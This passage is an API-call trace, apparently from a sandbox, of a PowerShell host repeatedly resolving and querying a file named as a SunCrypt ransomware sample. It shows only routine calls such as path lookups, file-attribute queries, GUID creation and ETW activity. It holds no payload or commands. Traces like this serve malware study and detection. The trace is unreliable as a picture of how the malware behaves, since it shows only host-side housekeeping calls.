lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.317] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.326] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701714239034) returned 1 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] EtwEventActivityIdControl () returned 0x0 [0104.326] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x64ea463a, Data2=0x5585, Data3=0x4f43, Data4=([0]=0x94, [1]=0x6, [2]=0x18, [3]=0xe8, [4]=0xbb, [5]=0x21, [6]=0x4e, [7]=0xbf))) returned 0x0 [0104.327] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.327] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701714387215) returned 1 [0104.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.327] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.327] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.328] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.331] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701714791748) returned 1 [0104.331] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] EtwEventActivityIdControl () returned 0x0 [0104.332] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1a5be49a, Data2=0xfe05, Data3=0x40d5, Data4=([0]=0x9f, [1]=0x32, [2]=0xae, [3]=0xff, [4]=0x10, [5]=0xce, [6]=0x41, [7]=0xf8))) returned 0x0 [0104.333] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.333] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701714958251) returned 1 [0104.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.333] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.338] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701715459400) returned 1 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] EtwEventActivityIdControl () returned 0x0 [0104.338] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdfc02cf4, Data2=0x5122, Data3=0x4b34, Data4=([0]=0x94, [1]=0x8b, [2]=0x17, [3]=0x5b, [4]=0x27, [5]=0x84, [6]=0x8e, [7]=0xb9))) returned 0x0 [0104.339] 
GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.339] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701715581978) returned 1 [0104.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.339] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.339] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.339] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a 
[0104.349] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701716536257) returned 1 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] EtwEventActivityIdControl () returned 0x0 [0104.349] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8d27c88d, Data2=0x2257, Data3=0x409f, Data4=([0]=0x85, [1]=0x94, [2]=0x2d, [3]=0x25, [4]=0xf, [5]=0xb6, [6]=0x5b, [7]=0x6b))) returned 0x0 [0104.350] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.350] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701716646323) returned 1 [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) 
returned 1 [0104.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.350] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.355] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701717111876) returned 1 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] EtwEventActivityIdControl () returned 0x0 [0104.355] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xda993602, Data2=0xa43f, Data3=0x4b48, Data4=([0]=0xa2, [1]=0x66, [2]=0xf2, [3]=0xb3, [4]=0x74, [5]=0x19, [6]=0x99, [7]=0x3c))) returned 0x0 [0104.355] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.356] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701717233910) returned 1 [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.356] 
GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.356] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.364] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701718085163) returned 1 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.364] EtwEventActivityIdControl () returned 0x0 [0104.365] EtwEventActivityIdControl () returned 0x0 [0104.583] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xab63dd40, Data2=0x831f, Data3=0x4a75, Data4=([0]=0x96, [1]=0xa3, [2]=0x33, [3]=0xbe, [4]=0x74, [5]=0x3a, [6]=0x68, [7]=0x15))) returned 0x0 [0104.584] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.584] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740079484) returned 1 
[0104.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.585] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.586] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740266563) returned 1 [0104.586] EtwEventActivityIdControl () returned 0x0 [0104.586] EtwEventActivityIdControl () returned 0x0 [0104.586] 
EtwEventActivityIdControl () returned 0x0 [0104.587] EtwEventActivityIdControl () returned 0x0 [0104.587] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2880e5d1, Data2=0xc9ef, Data3=0x415d, Data4=([0]=0x8c, [1]=0x36, [2]=0x36, [3]=0xc0, [4]=0xce, [5]=0xcc, [6]=0x8b, [7]=0x13))) returned 0x0 [0104.587] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.587] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740405697) returned 1 [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.588] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: 
lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.590] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740647446) returned 1 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] EtwEventActivityIdControl () returned 0x0 [0104.590] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xb8ec975c, Data2=0x1f39, Data3=0x4742, Data4=([0]=0x99, [1]=0xe4, [2]=0x8, [3]=0x5d, [4]=0x7d, [5]=0x6a, [6]=0x9b, [7]=0x7f))) returned 0x0 [0104.591] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.591] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701740790534) returned 1 [0104.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.591] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.592] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: 
lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.592] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.592] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.593] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701740959935) returned 1 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] EtwEventActivityIdControl () returned 0x0 [0104.593] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1e6838c, Data2=0x481f, Data3=0x4ed2, Data4=([0]=0x83, [1]=0xb6, [2]=0x6f, [3]=0x4, [4]=0x81, [5]=0xfc, [6]=0x9d, [7]=0xe6))) returned 0x0 [0104.594] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.594] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701741060899) returned 1 [0104.594] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.594] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.594] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.595] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.596] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701741244489) returned 1 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] EtwEventActivityIdControl () returned 0x0 [0104.596] CoCreateGuid (in: 